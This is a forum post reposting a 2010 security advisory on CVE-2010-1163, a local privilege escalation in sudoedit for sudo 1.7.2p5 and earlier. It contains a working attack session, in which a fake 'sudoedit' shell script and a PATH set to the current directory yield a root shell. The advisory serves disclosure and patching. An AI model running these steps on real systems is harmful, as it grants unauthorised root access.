Ir para o conteúdo
  • Revista PROGRAMAR: Já está disponível a edição #60 da revista programar. Faz já o download aqui!

herakty

Exploit Linux sudoedit local privilege escalation through PATH manipulation

Mensagens Recomendadas

herakty
Security Advisory @ Mediaservice.net Srl

(#02, 19/04/2010) Data Security Division

        Title: sudoedit local privilege escalation through PATH manipulation

  Application: sudo <= 1.7.2p5

      Platform: Linux, maybe others

  Description: A local user with permission to run the sudoedit pseudo-command

can gain root privileges, through manipulation of the PATH

environment variable.

      Authors: Valerio Costamagna <sid@mediaservice.net>

                Maurizio Agazzini <inode@mediaservice.net>

Vendor Status: sudo team notified on 26/03/2010

CVE Candidate: The Common Vulnerabilities and Exposures project has assigned

the name CVE-2010-1163 to this issue.

    References: http://lab.mediaservice.net/advisory/2010-02-sudo.txt

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1163

http://www.sudo.ws/sudo/alerts/sudoedit_escalate2.html

2. Example Attack Session.

inode@pandora:~$ echo "/bin/sh" > sudoedit
inode@pandora:~$ /usr/bin/chmod +x sudoedit
inode@pandora:~$ id
uid=1000(inode) gid=100(users) groups=100(users)
inode@pandora:~$ export PATH=.
inode@pandora:~$ /usr/bin/sudo sudoedit /etc/hosts
Password:
sh-3.1# /usr/bin/id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),
10(wheel),11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev),84(power),
86(netdev),93(scanner)
sh-3.1#

http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100419/94d5872c/attachment.txt

teckV

Partilhar esta mensagem


Ligação para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!

Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.

Entrar Agora

×

Aviso Sobre Cookies

Ao usar este site você aceita os nossos Termos de Uso e Política de Privacidade. Este site usa cookies para disponibilizar funcionalidades personalizadas. Para mais informações visite esta página.